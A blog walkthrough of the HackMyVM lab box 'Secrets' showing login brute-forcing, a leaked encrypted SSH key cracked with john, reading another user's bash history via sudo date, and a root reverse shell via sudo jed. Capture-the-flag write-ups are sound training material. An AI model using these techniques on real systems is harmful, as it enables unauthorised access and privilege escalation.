HackMyVM: Secrets

I had a few days off, because I was away with no access to a PC. Now I’m back.

This is Secrets. It’s Medium rated.

Ports

SSH and HTTP only.

HTTP

The frontpage says:

I have to tell you a secret…

And there is a comment:

written by brad

So we have a username. At /secrets/ we get this:

I keep wanting to tell you a secret…

Thanks brad. Fuzzing brings us to /secrets/login_form.php and we can bruteforce it to reveal our creds, which are brad:bradley

Logging in gives us access to a page that says:

Enter ip to send secret:

Any input that contains any character that isn’t a number (0-9) results in the following:

[!] Secrets only accept numbers.

Converting my IP (10.10.10.2) gives 168430082 in decimal, so I use that. Listening with tcpdump:

┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# tcpdump -i any     
tcpdump: data link type LINUX_SLL2
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
00:35:02.610890 eth0  Out IP 10.10.10.2.47460 > 10.10.10.45.http: Flags [S], seq 1725047437, win 64240, options [mss 1460,sackOK,TS val 292236947 ecr 0,nop,wscale 10], length 0
00:35:02.611114 eth0  In  IP 10.10.10.45.http > 10.10.10.2.47460: Flags [S.], seq 3453361331, ack 1725047438, win 65160, options [mss 1460,sackOK,TS val 4039950164 ecr 292236947,nop,wscale 7], length 0
00:35:02.611142 eth0  Out IP 10.10.10.2.47460 > 10.10.10.45.http: Flags [.], ack 1, win 63, options [nop,nop,TS val 292236948 ecr 4039950164], length 0
00:35:02.611225 eth0  Out IP 10.10.10.2.47460 > 10.10.10.45.http: Flags [P.], seq 1:573, ack 1, win 63, options [nop,nop,TS val 292236948 ecr 4039950164], length 572: HTTP: POST /secrets/AYPIN9UG8WHWN0UE09Y2.php HTTP/1.1
00:35:02.611376 eth0  In  IP 10.10.10.45.http > 10.10.10.2.47460: Flags [.], ack 573, win 505, options [nop,nop,TS val 4039950164 ecr 292236948], length 0
00:35:02.614025 eth0  In  IP 10.10.10.45.52990 > 10.10.10.2.6666: Flags [S], seq 655884510, win 64240, options [mss 1460,sackOK,TS val 4039950167 ecr 0,nop,wscale 7], length 0
00:35:02.614066 eth0  Out IP 10.10.10.2.6666 > 10.10.10.45.52990: Flags [R.], seq 0, ack 655884511, win 0, length 0

Something is going on with port 6666

┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# nc -nvlp 6666                                                                                                                                                                  
listening on [any] 6666 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.45] 52998
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,478250418EF67EB4

MvfHsFbuTgPyi0PeU9dWPL8wVaIKHsuvYEIdwNJF42eDz0/L5kdoBnA8+yuWAI28
iI2jtehZHb/7PuaIsCtrzrJ0B1xXZYoeSc4Dfu2j1gi/ToaO3A6RHseHWHsjM9Qw
4AzHS13ze+EQTLHMnTu6eCADEXhwShgrHAmJpw4irdTca+wuY83n38obX0EhrXAs
E8zZfY8yMg4nuq9cP5pZ17IjvQbfk4cvfD4jNN4rXXn8WVlY5tdBH6Bg3lBoZDwD
VfNwZCmUrNIfMamNXjhMzkBNBwPXaNARokQded6c9Ie2PmdPMKPOkL/9QlM77OaE
d0xid9s1u4z2H/Q8GrODUc7eJar95bFLUySNoTiVFPqbVTvQ9tZNSWNTkQ5kgCXj
YRroAtvp0f0UdcPAOFRjsEFqQ4MqwZy26j1rhhAJQKg+q6SkyPv73kRotXajaAK3
irNHqNgzIKmkY9x9rfPTxiGw1oJyJxyNwQ3pZilih5AvI8EQBRVAN7Nb6utjDnkV
u1cjWr6ZN3lC67rhxwXZ9cub1KoQ1pwrzg0Iy1/x2d6zFHeuAkjlSeO8jkUpT1Eb
tdRdrJh712pW9vDg36VaQnrfeNVFPYmku0OXFXgsfiJ+XAJYQX+K2e4N3vRKuXSp
zH5nyL5d1r1Z+wn2s9Ial/zbhCUdOJiwZ87N7yIzCvykMnjEIPwytouWY/Ed4tq8
AqAegiMF5Y7M7+FC+ZH8EUvRCEzUPjS+T0KxgGY1KCTSUfL7QGZwQRKZ1hC879n6
ouj03SFu2VqiuMOXcs8lSjas5vyQgz4XhF58OUzi/BYrqCQBMV3W8RWviJzQvYwV
zBl5lkKsUMJ1Y4xLWBP64LnnEPRViPq7TGxYa6aTZ6rmTIe6dJORhIRVdPilGMYs
4462OpFpIYqWgKNGOJ1GMRf/juiE3J4pBwpslbefxt9SZnwnE9xHgRBInmqJgneC
38EJWyUwJqqlUSSoki3PB19KFpjy9U3YUPPF0Ff8jNg0x3FFLSFqLI4wyTPXH9+J
AalS64ttaP8PoiPxSK9oEXcj8RXVLq99Xdkq9gx25qw/Hca7wOIEUsAmjdtKYMVL
ccsaCrRsC1IMF3Wu1l4ihIwzBBA+l5ZhFIgD9hgUdtinchC3+TRI6r6Cnlbj2rB+
NrSpX7D3X1I5s15FmZuo1kkRH3xxjR1LLRuEjQkg3CTpZnUK5nDLgYo9dSnd0QzM
yOACjV6NiI1PJr7hM08OBuxd5I+FB8JyVJozQMMNoooNdvBNJvFoAXvaqqfY64fu
lYQXXEiPhOVajVGieA2tHmlLf7v6KDCqePZ+/KqxGqn+jIxsjjItCxOlW2OWxWCB
iLsB4JJ0NmKCFJh27wCvyMM1+Z8Kmt2BptCEREBHGxIkOraFBk6MN1bqBBi02UE/
C6piJetSpBUwjOOUs4hiwGRtYf5w4Hut8rsMs79/D3HsG8UPpZsrUKOcv8ZIosOg
+jOuyVfxN44ySVuB2gVVU904GHIdMRyBeR6udv/qgxabGyShoeRhUjA3PPZEDw7B
LPMDfxOmzS9h/8CEK5RHQsxt6krtooRpf5HLCczehCzWzQXKPfnXwg==
-----END RSA PRIVATE KEY-----

That’ll do.

┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# python /usr/share/john/ssh2john.py id_enc > id_rsa.john
┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# john id_rsa.john -w=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
security         (id_enc)     
1g 0:00:00:00 DONE (2022-01-02 00:39) 100.0g/s 307200p/s 307200c/s 307200C/s 753159..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                          
┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# chmod 600 id_enc        
                                 
┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# ssh -i id_enc brad@10.10.10.45
Enter passphrase for key 'id_enc': 
Linux secrets 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
brad@secrets:~$ sudo -l
Matching Defaults entries for brad on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brad may run the following commands on secrets:
    (fabian) NOPASSWD: /usr/bin/date

What’s fabian got for me?

brad@secrets:~$ LFILE=/home/fabian/.ssh/id_rsa
brad@secrets:~$ sudo -u fabian /usr/bin/date -f $LFILE
/usr/bin/date: /home/fabian/.ssh/id_rsa: No existe el fichero o el directorio

Nope. How about….

brad@secrets:/$ LFILE=/home/fabian/.bash_history
brad@secrets:/$ sudo -u fabian /usr/bin/date -f $LFILE
sudo -u fabian /usr/bin/date -f $LFILE
/usr/bin/date: fecha inválida «cd ~»
/usr/bin/date: fecha inválida «ls -la»
/usr/bin/date: fecha inválida «passwd fabian»
/usr/bin/date: fecha inválida «s3cr3t$$$L0v3$$$»
/usr/bin/date: fecha inválida «exit -y»
brad@secrets:/$ su fabian
Contraseña: 
fabian@secrets:/$

Thanks, fabian.

fabian@secrets:~$ sudo -l
Matching Defaults entries for fabian on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fabian may run the following commands on secrets:
    (root) NOPASSWD: /usr/bin/jed
fabian@secrets:~$

It’s a text editor and we can run shell commands from within, like sending ourselves a reverse shell:

┌──(root💀kali)-[/opt/hackmyvm/secrets]
└─# nc -nvlp 1234 
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.45] 47152
tput: unknown terminal "unknown"
root@secrets:~# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)                                                     
secrets
dom ene  2 06:50:44 CET 2022
root@secrets:~# exit

Or you can just open a terminal inside the editor. Anyway I’d not seen it before and this was a nice little challenge, this write-up made it sound super easy but it took a bit to figure out the port 6666 thing, I was busy trying command injections and looking at PCAPs first. But I got there and that’s what counts :)